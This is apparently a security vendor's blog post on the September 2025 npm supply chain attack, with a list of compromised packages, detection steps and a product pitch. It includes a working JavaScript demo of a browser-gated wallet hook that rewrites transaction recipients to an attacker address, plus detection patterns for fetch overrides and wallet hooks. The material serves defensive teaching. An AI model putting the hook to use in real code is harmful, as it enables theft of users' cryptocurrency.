Supply chain attacks are no longer rare anomalies. They are becoming one of the most direct and damaging paths into modern software systems. On September 8, 2025 that reality became impossible to ignore. Attackers slipped malicious code into some of the most widely used npm packages on the planet, including chalk, debug, ansi-regex and others downloaded billions of times each month.
This was not a theoretical exercise. It was a coordinated supply chain attack designed to quietly hijack crypto wallet interactions inside browser-based applications, rewrite transaction destinations and exfiltrate sensitive data. Within hours, compromised versions of popular libraries had already been pulled into build pipelines, shipped to production and embedded deep inside frontend bundles.
Incidents like this reveal how fragile the software supply chain can be. They also show why visibility, SBOM-based monitoring and dependency reachability analysis matter for every engineering team. Platforms such as ScanDog help teams detect malicious package versions immediately and understand whether those packages are actually executed in their applications.
How the npm Supply Chain Attack Unfolded
The attack moved quickly. By the time the malicious versions were removed, countless projects had already installed them as part of automated builds.
A brief timeline
- A maintainer’s npm account was compromised through phishing.
- Malicious versions were published within hours.
- Developers unknowingly pulled compromised versions through normal installs.
- Security researchers spotted suspicious browser-based behaviour.
- npm removed the malicious versions, but the window was long enough for widespread propagation.
This pattern underscores a difficult truth. The security of your application depends not only on your code, but on every dependency you trust.
How the Malicious Payload Worked
Researchers who de-obfuscated the payload discovered something particularly concerning. The attack activated only when bundled into frontend code and executed in a browser, making seemingly harmless output-formatting libraries a perfect delivery vehicle.
What the payload did
- Intercepted wallet and network related APIs
- Rewrote transaction destinations to redirect funds
- Exfiltrated crypto wallet data for later use
- Remained dormant in Node.js environments to evade detection
This combination made the attack both targeted and deceptive, and dangerous for any application interacting with web3, browser wallets or crypto transactions.
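To make the four behaviours above concrete, here is an added example (neither the attacker's payload nor ScanDog's code) of the shape such a browser-gated wallet hook takes, next to the defender-side check that catches it. `win` stands in for the browser's window object, and the provider, the addresses and the transaction are all constructed for the demo; nothing real is touched.

```javascript
// Added example (neither the attacker's payload nor ScanDog's code): the shape of a
// browser-gated wallet hook as the page describes it, next to the defender-side
// check that catches it. `win` stands in for the browser's window object and the
// provider below is a constructed stand-in; no real wallet or network is touched.

// Activation gate. A payload guarded like this is inert under Node.js, in unit
// tests and in most CI, which is why "dormant in Node" evades so many checks.
function shouldActivate(win) {
  return typeof win !== "undefined" && win !== null && typeof win.ethereum === "object";
}

// Hook shape: wrap provider.request and rewrite the recipient of eth_sendTransaction
// before the real provider sees it. Every other call passes through untouched, so the
// dapp keeps working and nothing looks odd until the funds have gone elsewhere.
function installHook(win, attackerAddress) {
  if (!shouldActivate(win)) return false;
  const original = win.ethereum.request.bind(win.ethereum);
  win.ethereum.request = function hooked(args) {
    if (args && args.method === "eth_sendTransaction" && Array.isArray(args.params)) {
      args = {
        ...args,
        params: [{ ...args.params[0], to: attackerAddress }, ...args.params.slice(1)],
      };
    }
    return original(args);
  };
  return true;
}

// Defender check: capture provider.request before any third-party bundle runs and
// compare by identity later. A swapped-in wrapper, however convincing its name or
// its toString() output, is a different function object.
function snapshotProvider(win) {
  return win && win.ethereum ? win.ethereum.request : undefined;
}
function providerTampered(win, snapshot) {
  return snapshotProvider(win) !== snapshot;
}

// Constructed stand-in for window plus an injected provider; records every request.
function makeFakeWindow() {
  const sent = [];
  return {
    sent,
    ethereum: { request: (args) => { sent.push(args); return Promise.resolve("0xtxhash"); } },
  };
}

// Demo: dormant without a window, active with one, and the snapshot check fires.
const demoWin = makeFakeWindow();
const demoSnapshot = snapshotProvider(demoWin);
console.log("activates in Node:", installHook(globalThis, "0xATTACKER"));   // false
installHook(demoWin, "0xATTACKER");
demoWin.ethereum.request({ method: "eth_sendTransaction", params: [{ to: "0xVICTIM", value: "0x1" }] });
console.log("recipient seen by provider:", demoWin.sent[0].params[0].to);  // 0xATTACKER
console.log("tampered:", providerTampered(demoWin, demoSnapshot));         // true
```

The snapshot only helps if it is taken before vendor code runs, for example in an inline script at the top of the HTML document rather than inside the application bundle, since bundlers typically execute dependency modules before the entry module's own statements.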
Confirmed Malicious Package Versions
Security teams have published a list of compromised releases. If any of these versions appear in lockfiles, SBOMs or deployed bundles, treat them as compromised:
chalk — 5.6.1
chalk-template — 1.1.1
ansi-regex — 6.2.1
strip-ansi — 7.1.1
wrap-ansi — 9.0.1
slice-ansi — 7.1.1
ansi-styles — 6.2.2
supports-color — 10.2.1
supports-hyperlinks — 4.1.1
has-ansi — 6.0.1
debug — 4.4.2
color-convert — 3.1.1
color-name — 2.0.1
color — 5.0.1
color-string — 2.1.1
simple-swizzle — 0.2.3
is-arrayish — 0.3.3
backslash — 0.2.1
How to Check Whether You Are Affected
Supply chain attacks demand fast verification. Teams should begin with a simple, structured checklist.
Step one: Search your lockfiles and installed modules for exact versions
Lockfiles record the version on a line near the package entry rather than as name@version, so search for the entry and read its version, then confirm with the package manager. Shown here for chalk 5.6.1; repeat for each package in the list:
grep -n -A3 'node_modules/chalk"' package-lock.json
find node_modules -path '*/chalk/package.json' -exec grep -H '"version"' {} +
npm ls chalk@5.6.1
The grep matches every copy in an npm v2/v3 lockfile, nested ones included, and npm ls prints (empty) when no copy of that exact version is installed. Use yarn why chalk or pnpm why chalk with the other package managers.
Step two: Scan with an SBOM
Generate an SBOM with syft or cdxgen and run it through a scanner such as grype, which matches every component in the SBOM, transitive and nested ones included, against its advisory feeds. A scanner only knows what its database has ingested, so also compare the SBOM's component list directly against the versions above.
syft . -o json > sbom.json
grype sbom:sbom.json
Step three: Inspect built frontend bundles
Because the payload executes only in browsers, examine production bundles and not just the dependency tree: look for overrides of window.fetch and XMLHttpRequest, hooks on window.ethereum and other wallet APIs, and for the compromised packages in module paths or source maps. window.ethereum appears legitimately in any dapp, so treat such hits as leads to inspect rather than verdicts.
If detected, respond as you would for a confirmed incident.
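The three steps above, carried out as one script, as an added example that is not ScanDog's tooling or the page's own code. It reads an npm package-lock.json (lockfileVersion 2 or 3), a CycloneDX JSON SBOM and a built bundle, and reports every match against the version list above. The version table is copied from the page; the lockfile, SBOM and bundle inputs are constructed for the demo.

```javascript
// Added example (not ScanDog's tooling or the page's own code): cross-check a
// package-lock.json (lockfileVersion 2/3), a CycloneDX SBOM and a built bundle
// against the compromised releases listed on the page. The version table is copied
// from the page; the three sample inputs at the bottom are constructed for the demo.
const COMPROMISED = {
  "chalk": ["5.6.1"], "chalk-template": ["1.1.1"], "ansi-regex": ["6.2.1"],
  "strip-ansi": ["7.1.1"], "wrap-ansi": ["9.0.1"], "slice-ansi": ["7.1.1"],
  "ansi-styles": ["6.2.2"], "supports-color": ["10.2.1"], "supports-hyperlinks": ["4.1.1"],
  "has-ansi": ["6.0.1"], "debug": ["4.4.2"], "color-convert": ["3.1.1"],
  "color-name": ["2.0.1"], "color": ["5.0.1"], "color-string": ["2.1.1"],
  "simple-swizzle": ["0.2.3"], "is-arrayish": ["0.3.3"], "backslash": ["0.2.1"],
};

function isCompromised(name, version) {
  return (COMPROMISED[name] || []).includes(version);
}

// npm lockfile v2/v3: "packages" is keyed by install path. Nested copies look like
// "node_modules/a/node_modules/b", so the name is whatever follows the last
// "node_modules/"; a plain grep for "name@version" would miss every one of them.
function scanLockfile(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === "") continue;                     // the root project entry
    const idx = path.lastIndexOf("node_modules/");
    if (idx < 0) continue;                         // workspace links, not installed packages
    const name = path.slice(idx + "node_modules/".length);
    if (meta && isCompromised(name, meta.version)) {
      hits.push({ name, version: meta.version, path });
    }
  }
  return hits;
}

// CycloneDX JSON: each component carries a purl such as pkg:npm/%40scope/name@1.2.3.
function scanCycloneDx(sbom) {
  const hits = [];
  for (const c of sbom.components || []) {
    const m = /^pkg:npm\/(.+)@([^?#]+)/.exec(c.purl || "");
    if (!m) continue;
    const name = decodeURIComponent(m[1]);
    if (isCompromised(name, m[2])) hits.push({ name, version: m[2], purl: c.purl });
  }
  return hits;
}

// Bundle triage: the payload only acts in a browser and works by hooking network and
// wallet APIs, so flag those hook patterns. window.ethereum appears in every
// legitimate dapp too, so a hit is a lead to inspect, not a verdict.
const BUNDLE_INDICATORS = [
  /window\.fetch\s*=/,
  /XMLHttpRequest\.prototype\.(open|send)\s*=/,
  /window\.ethereum/,
  /eth_sendTransaction/,
];

function scanBundle(source) {
  return BUNDLE_INDICATORS.filter((re) => re.test(source)).map((re) => re.source);
}

function triage(lock, sbom, bundle) {
  return { lockfile: scanLockfile(lock), sbom: scanCycloneDx(sbom), bundle: scanBundle(bundle) };
}

// --- constructed sample inputs (not real project files) ---
const sampleLock = {
  name: "demo-app", lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/chalk": { version: "5.6.1" },                       // compromised
    "node_modules/debug": { version: "4.3.7" },                       // clean
    "node_modules/foo/node_modules/ansi-regex": { version: "6.2.1" }, // nested, compromised
  },
};
const sampleSbom = {
  bomFormat: "CycloneDX", specVersion: "1.5",
  components: [
    { type: "library", name: "debug", version: "4.4.2", purl: "pkg:npm/debug@4.4.2" },
    { type: "library", name: "color-name", version: "1.1.4", purl: "pkg:npm/color-name@1.1.4" },
  ],
};
const sampleBundle =
  "const _f=window.fetch;window.fetch=function(u,o){return _f(u,o)};" +
  "if(window.ethereum){/* provider hook */}";

console.log(JSON.stringify(triage(sampleLock, sampleSbom, sampleBundle), null, 2));
```

To run it against real files, replace the three samples with `JSON.parse(fs.readFileSync(...))` for the lockfile and SBOM and the bundle's text for `sampleBundle`; a CycloneDX SBOM comes from `syft . -o cyclonedx-json` or `cdxgen`. Any non-empty `lockfile` or `sbom` result is a confirmed compromised version in the tree, and a `bundle` result tells you which chunk to read by hand.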
Immediate Remediation Checklist
- Check your lockfiles and SBOMs for the compromised versions
- Rebuild in clean environments, with node_modules and the package manager cache cleared rather than reused
- Pause deployments until all dependencies are validated
- Rotate secrets such as npm tokens and CI credentials
- Treat any exposure as a security incident
These steps buy back control during the first hours, when it matters most.
How ScanDog Helps During a Supply Chain Attack
When an npm supply chain attack hits, the critical question becomes immediate. Are we exposed? And if so, where?
ScanDog helps answer this without guesswork.
Instant detection through SCA and SBOM monitoring
ScanDog scans repositories and pipelines against live SCA feeds, flagging malicious npm versions automatically. No manual searching required.
Clarity through reachability analysis
Dependency scanning often produces noise. ScanDog’s reachability engine shows whether vulnerable or malicious functions are actually executed in your application, allowing teams to prioritise real impact.
Automated containment workflows
ScanDog can block builds containing compromised versions, open remediation tickets and alert teams in Slack or Teams to prevent further exposure.
Faster remediation with AI Fix
The platform suggests safe versions, generates pull requests and explains changes clearly so engineering teams can move quickly and confidently. Learn more about AI Fix.
Centralised visibility through the Remediation Center
Teams can see which repositories are affected, who owns the fix and what has already been resolved through the Remediation Dashboard.
This transforms the response from ad hoc searches and scattered Slack threads into a calm, structured workflow.
Final Thoughts: Supply Chain Security Is Now a Daily Reality
The npm attack is a reminder of how deeply software ecosystems depend on trust. A single compromised maintainer account can send malicious code into millions of projects within hours. Dependency transparency, continuous SBOM monitoring and reachability based prioritisation are no longer optional. They are essential.
With modern tools and structured workflows, teams can respond quickly when incidents arise and maintain the confidence that what they ship is trustworthy.
ScanDog is an AI-powered Application Security Posture Management (ASPM) platform that helps development teams build secure software faster. With advanced vulnerability prioritization, reachability analysis, and AI-assisted remediation, ScanDog cuts through the noise of false positives to focus on what truly matters.